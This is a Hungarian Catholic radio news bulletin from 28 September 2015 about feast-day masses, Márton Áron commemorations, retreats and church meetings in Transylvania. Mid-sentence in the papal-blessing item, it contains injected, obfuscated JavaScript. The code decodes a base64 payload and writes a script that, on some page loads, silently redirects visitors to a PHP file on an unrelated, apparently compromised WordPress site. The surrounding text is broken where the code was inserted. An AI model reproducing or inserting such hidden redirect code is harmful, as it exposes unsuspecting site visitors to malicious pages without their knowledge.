2015. szeptember 28. – Hírek és programajánló

H Í R E K   E S T E

Csíki csapatok nyertek Lakiteleken
Márton Áron, a XX. század püspöke címmel vetélkedőt hirdetett a csíkszentdomokosi Márton Áron Múzeum, a Lakiteleki Népfőiskola, a Székelyföld Alapítvány és Magyarország Csíkszeredai Főkonzulátusa. A budapesti Országházban megtartott eredményhirdetés alkalmával első díjat vehetett át a csíkszeredai Márton Áron Gimnázium Fehér füst-csapata, azaz Kósa Johanna, Tankó-Gábor Tihamér és Kovács Róbert tanulók, felkészítő tanáruk Lőrincz Éva Katalin hitoktató volt, akárcsak a második díjas csapatnak, amelyet Lázár Aletta, Lázár Andrea és Péter Loránd, szintén a Márton Áron Gimnázium tanulói alkottak. A vetélkedő része annak a program-sorozatnak, amely Márton Áron püspök életpéldájának, tanításának jobb megismertetését tűzte célul a Kárpát-medencében. Ennek keretében hirdette meg a Székelyföld kulturális folyóirat azt az alkotói pályázatot, amely Márton Áron püspök életpályájából merítő irodalmi művek (vers, próza, esszé, filmnovella, színmű, riport stb.) alkotására hívott. Az alkotói pályázat díjazását is a Parlamentben tartották szeptember 26-án. A díjazottak: Tar Ildikó (I.), Oláh-Gál Elvira (II.) és Nagy Zoltán (III.), aki a rádiónk önkéntes munkatársa. 

Szent Mihály napi búcsúk
Holnap Szent Mihály főangyal ünnepén, a gyulafehérvári főegyházmegye és székesegyház védőszentjének a napján tartják a székesegyház búcsúját, mely egyben a Hittudományi Kar tanévnyitó Veni Sancte-ja is. Az ünnepi szentmise délelőtt tizenegy órától kezdődik. 
Szeptember 29. a kolozsvári Szent Mihály templom búcsúünnepe is. Holnap este hat órakor kezdődik az ünnepi szentmise, melynek főcelebránsa és szónoka Horváth István főesperes-plébános, főegyházmegyei főtanfelügyelő. A Mária Rádió mindkét szentmisét közvetíti.
Lemhényben, az ünnepi szentmise holnap délelőtt tizenegy órakor kezdődik a Szent Mihály  hegyen. A szentmisét Bodó Imre aranymisés celebrálja, szentbeszédet mond Kakucsi Béla Szilveszter, ferences atya.
A türkösi plébániatemplomban holnap délután öt órakor kezdődik az ünnepi szentmise. A búcsú szónoka Ráduly István Zsolt, brassói segédlelkész.
Csíkszentmihályon az ünnepi szentmisét délelőtt tizenegy órától tartják a helyi plébániatemplomban, amelyen Szilveszter Imre hidegségi plébános mond szentbeszédet.
A szatmári egyházmegyében mezőfényen holnap délelőtt tizenegy órától lesz a búcsúmise, mely idén egyben aranymise is, hiszen a falu szülötte, Heinrich Ferenc, a nagybányai Árpád-házi Szent Erzsébet egyházközösség plébánosa ötven éves papi szolgálatért ad hálát, és  aranymisés áldást a jelenlevőkre. Az alkalom ünnepi szónoka  Román János nagybányai esperes lesz.

Találkozóra várja önkénteseit a Mária Rádió
A nagyváradi találkozó nyitja a kéthavonta megrendezésre kerülő önkéntes-találkozók sorát, mely szerda délután hat órakor szentmisével kezdődik a nagyváradi stúdió kápolnájában. A következő helyszínekről a kedves hallgatók híradóinkból értesülhetnek . 

Kis Szent Teréz búcsú Székelyudvarhelyen
Október 1-jén, csütörtökön délután öt  órakor kezdődik a búcsús szentmise a székelyudvarhelyi  Kis Szent Teréz  templomban. Ezt megelőzi egy három napos lelkigyakorlat, mely minden este fél hét órától kezdődik  A megszentelt élet évében ma  este Kovács Csaba, Antal ferences testvér Székelyudvarhelyről,  kedden este  Balla Péter, Barnabás pálos atya Hargitafürdőről, valamint  szerdán este Sárközi Sándor piarista atya Csíkszeredából tartják a lelkigyakorlatos szentmiséket. A búcsús szentmise ünnepi szónoka Jakabos Barnabás jezsuita atya Marosvásárhelyről. 

Pax Romana  tanulmányi napok Tusnádfürdőn
A Romániai Magyar Pax Romana 2015-ös évi tanulmányi napjait Tusnádfürdőn a Zöld ház panzióban  tartja október 1–4. között. Gazdag programokkal várják az érdeklődőket. Meghívott előadók Bilibók Géza tusnádfürdői plébános, Kasza László, brassói egyetemi lelkész, a Márton Áron boldoggá avatási per viceposztulátora. Érdeklődni és jelentkezni a 0742 792 187 vagy a 0745 359 863-as telefonszámokon, vagy a következő  E-mail címeken,  pmaria46@yahoo.com vagy az oloszerzsebet@freemail.hu címen.

Szentmisével ünneplik az időseket
Október 3-án szombaton, délelőtt tizenegy órától ünnepi szentmisét tartanak a szatmárnémeti székesegyházban. Hársfalvi Ottó általános helynök mutatja be a legszentebb áldozatot. A résztvevők teljes búcsút nyerhetnek a szokott feltételek mellett. Mindazoknak, akiknek nehézséget jelent eljutni a Székesegyházba, a szervezők ingyenes szállítást biztosítanak. Az erre igényt tartó személyeket kérik, hogy október 1-ig jelentkezzenek a Szatmári Római Katolikus Püspökség 0261-714955-ös telefonszámán munkanapokon, reggel nyolc és délután négy óra között.

Rózsafüzér társulatok II. találkozója
A Szeben-Fogaras-Erzsébetváros kerületi rózsafüzér társulatok II. találkozója lesz október 10-én a medgyesi római katolikus templomban. A program délelőtt tiz órától délután két óráig tart, melyben lesz rózsafüzér imádkozás a részvevők szándékaiért, szentmise, rózsafüzérek megáldása és gyónási lehetőség. Érdeklódni a 0269 841 904-es telefonszámon lehet.

Az időjárásról: Őszies, borongós – hűvös időszakban lesz részünk a következő napokban is. Holnap az ország északi felén változóan felhős-napos időre van kilátás, délebbre viszont erősen felhős, borult lesz az ég. Szeles marad az idő. Hajnalban 3-8, délután 10-17 fokra készülhetünk. 

MRE – Hírszolgálat, 2015. szeptember 28.


H Í R E K   R E G G E L / D É L B E N

Pápai áldás a csíksomlyói jubileumi Mária-év befejezése alkalmából
A Csíksomlyói Szűzanya csodatevő kegyszobrának 500 éves évfordulója alkalmából a Szentatya szívélyes üdvözletét küldte. Azt kívánja, hogy ez a jelentős esemény élesszen megújult és hiteles tiszteletet a Szűzanya iránt, amely ösztönözze a keresztény közösséget egy állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó lángoló evangéliumi tanúságtételre, és a Megváltó édesanyjának közbenjárására bőséges égi kegyelmeket kérve Jakubinyi György érsek úrra, valamint a főegyházmegye minden hívője számára,  és küldi apostoli áldását.

Márton Áron-emlékülést tartottak a magyar Parlamentben
Márton Áron egykori erdélyi püspök emlékére tartottak konferenciát szeptember 26-án a Parlament Felsőházi üléstermében. A rendezvényen részt vett Jakubinyi György gyulafehérvári érsek, Bábel Balázs kalocsa-kecskeméti érsek, illetve Lezsák Sándor, az Országgyűlés alelnöke is.
Jakubinyi György érsek Márton Áron püspöki jelmondatáról tartott előadásában arról beszélt, hogy a Szent Márton-i mondat: „non recuso laborem" elsődlegesen azt jelenti, hogy „nem vonakodom a munkától", a labor szó azonban nemcsak munkát, hanem szenvedést is jelent. Márton Áronról pedig elmondható, hogy jelmondatát teljesen megélte, „mind a munka, mind a szenvedés irányában" – méltatta az érsek.

Székesegyházi búcsú és Veni Sancte  Gyulaféhérváron
Holnap  Szent Mihály főangyal ünnepén, a gyulafehérvári  főegyházmegye  és székesegyház védőszentjének a napján tartják a  székesegyház  búcsúját, mely egyben a  Hittudományi Kar tanévnyitó Veni Sancte-ja is. Az ünnepi szentmise délelőtt tizenegy  órától kezdődik, melyet rádiónk élőben közvetít. E napon van Isten Szolgája Márton Áron püspök halálának 35. évfordulója is.  Imádkozzunk boldoggá avatásáért!

Búcsú a kolozsvári Szent Mihály templomban
Holnap este hat órai kezdettel kerül sor a kolozsvári Szent Mihály templom búcsúünnepére, melyre szeretettel várják a kedves híveket. A szentmise főcelebránsa és szónoka Horváth István főesperes-plébános, főegyházmegyei főtanfelügyelő. Elhangzik Anton Hubatschek: Missa VI in c-moll a Szent Cecilia kórus és zenekar előadásában, illetve egyházzenei szolgálatot teljesít a Báthory István Elméleti líceum vegyeskara, vezényel dr. Potyó István karnagy.

Búcsú Csíkszentmihályon
Holnap, Szent Mihály, Gábor és Ráfáel főangyalok emlékünnepén, Csíkszentmihályon búcsú ünnepségre kerül sor. Az ünnepi szentmisét délelőtt tizenegy órától tartják a helyi plébániatemplomban, amelyen Szilveszter Imre hidegségi plébános mond szentbeszédet.

Kis Szent Teréz búcsú Székelyudvarhelyen
Október 1-jén, csütörtökön délután öt  órakor kezdődik a búcsús szentmise a székelyudvarhelyi  Kis Szent Teréz  templomban. Ezt megelőzi egy három napos lelkigyakorlat, mely minden este fél hét órától kezdődik  A megszentelt élet évében ma  este Kovács Csaba, Antal ferences testvér Székelyudvarhelyről,  kedden este  Balla Péter, Barnabás pálos atya Hargitafürdőről, valamint  szerdán este Sárközi Sándor piarista atya Csíkszeredából tartják a lelkigyakorlatos szentmiséket. A búcsús szentmise ünnepi szónoka Jakabos Barnabás jezsuita atya Marosvásárhelyről.

325 éves az esztelneki ferences jelenlét
Október 1-én lesz 325 éve annak, hogy a Szent István Királyról nevezett Erdélyi Ferences Rendtartomány kolostort alapított Esztelneken. Ez alkalomból rendezvénysorozattal készülnek. A rendezvény sorozat csúcspontja az október 1-én, csütörtökön délután hat órakor kezdődő hálaadó-jubileumi és Szent Ferenc tiszteletére bemutatott búcsús szentmise lesz. Az ünnepi szentmise főcelebránsa és szónoka Tamás József segédpüspök.

Pax Romana  tanulmányi napok Tusnádfürdőn
A Romániai Magyar Pax Romana 2015-ös évi tanulmányi napjait Tusnádfürdőn a Zöld ház panzióban  tartja október 1–4. között. Gazdag programokkal várják az érdeklődőket. Meghívott előadók Bilibók Géza tusnádfürdői plébános, Kasza László, brassói egyetemi lelkész, a Márton Áron boldoggá avatási per viceposztulátora.. Érdeklődni és jelentkezni a 0742 792 187 vagy a 0745 359 863-as telefonszámokon, vagy a következő  E-mail címeken,  pmaria46@yahoo.com vagyaz oloszerzsebet@freemail.hu címen.

Rózsafüzér társulatok II. találkozója
A Szeben-Fogaras-Erzsébetváros kerületi rózsafüzér társulatok II. találkozója lesz október 10-én a medgyesi római katolikus templomban. A program délelőtt tiz órától délután két óráig tart, melyben lesz rózsafüzér imádkozás a részvevők szándékaiért, szentmise, rózsafüzérek megáldása és gyónási lehetőség. Érdeklódni a 0269 841 904-es telefonszámon lehet.

Erdélyi Katolikus Karizmatikus Találkozó
A kézdivásárhelyi sportcsarnokban október 10-én, immár tizenkettedik alkalommal szervezik meg az Erdélyi Katolikus Karizmatikus Találkozót „Beteltek Szentlélekkel, s bátran hirdették Isten igéjét” mottóval. A találkozó alkalmat ad a közös dicsőítésre, imádságra, eukarisztikus ünneplésre, igehírdetésre is. Meghívott előadó Kúnszabó Zoltán az Új Jeruzsálem közösség alapítója. További információk a www.ekkm.ro honlapon találhatók.

MRE - Hírszolgálat, 2015. szeptember 28.

About the author

maradmin

Leave a Comment